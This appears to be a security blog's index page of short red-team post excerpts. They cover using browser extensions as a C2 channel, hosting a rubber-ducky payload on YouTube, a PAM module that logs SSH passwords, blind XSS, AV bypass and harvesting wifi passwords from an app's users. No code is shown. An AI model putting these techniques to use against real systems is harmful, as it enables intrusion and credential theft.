Using Firefox webextensions as c2 client
ATTENTION
This technique was tested only on Linux, it’ll not work on Mac or Windows.
»This technique was tested only on Linux, it’ll not work on Mac or Windows.
»It’s a trick created during a red team mission, where we have a rubber ducky, which will download a bash script to run the GTRS on the victm machine, but we have problem, the traffic with the C2 will be safe using the GTRS, but the infected machine need to talk directly to the C2 to get our payload, so we had the idea to use Youtube to host our bash payload.
»Today I was introduced to H2 Database, a in-memory and pure Java Database, because it’s a in-memory database, the developers use it most to learning, unit tests and poc’s, but you can learn more about it on H2 site.
»Recently I moved to another city to live alone, and as needed I contract the only ISP available on my building, NET, one of the worst ISP on Brazil, they just decided to block all my output connections on port 22/ssh, but it’s another history.
»Recently I posted how to get ssh password using strace, but it’s no 100% effective, because the strace output changes on different distros, so searching for another approach I found this site ChokePoint where they show how to create a PAM module using python to log failed attempts on ssh, now all I have to do, was change where they log the password. Original script, use the function auth_log when the login failed.
»BEFORE ALL, it’s an old trick, but all the tutorials that I found didn’t work for me, so I just wrote my own :). Sometimes when you get root access to a server or a workstation, you don’t really have the root password, sometimes you just exploit the server, and got id 0, what can I do in this case?
»It’s common to you find XSS vulnerabilities during an web pentests, but some times, you’re testing an application that contains more then one interface, like user interface and admin interface, so how you can test for xss on the admin interface being just a regular user? Well it’s kind of simple, but it’s not a test to find all the xss on the admin page, for example, when you register on an application, there’s some informations you provide, like, name, address, bio and other things, so we can assume that the admin interface can read this informations, so we can just send XSS payloads, to try to get a XSS exploration, but not a payload like the most common,
»Esse ano pela primeira vez fui para Recife, e palestrei na BWCON evento organizado pelo mestre @Toronto com patrocínio da Tempest e da El Pescador, um evento sinistro, galera com alto nível técnico. Minha talk foi sobre Bypass de AV com VBA + Powershell, uma parada simples, mas que pode salvar ai em alguns projetos onde a única porta de entrada para a rede do cliente vai ser o phishing. Vou deixar aqui então o link do ppt(Gdrive) e os videos da PoC.
»When your device is not rooted, and you want to analyse some app, you can’t just pull the application apk from it, so to do that, I use this trick.
»You can find on the internet various wordlists focused on cracking wifi passwords, but it’s not the best wordlists to use in Brazil, so what about get some real brazilian passwords? There is an app called MandicMagic, it’s a social network, where the users save password of wifi network that they use or used sometime, well here is our honeypot, we just need to intercept the requests and try to discover how the app works. In my first attempt I failed, because all the requests made by the app are pinned, but thanks to Inspeckage was really easy to bypass it, the Inspeckage hooks the pinning function, I’ve just followed the tutorial of how to use Genymotion + Inspeckage + Xposed and intercept all the app requests.
»It’s a simple x86 shellcode to call /bin/sh, but the first thing is understand how the sys_execve works, to do so you can access this site that gives to you a list with all the x86 syscalls, and the values you need to put in each register, just search for sys_execve.
»The first thing to do is to run the “file” command, which will indicate that the file is an elf32. After that the binary was analyzed on r2 and I ended up realizing that I forgot to do the most simple and obvious thing as I am certified SGSE ( Strings grep Specialist Engineer), so I just executed the following command:
»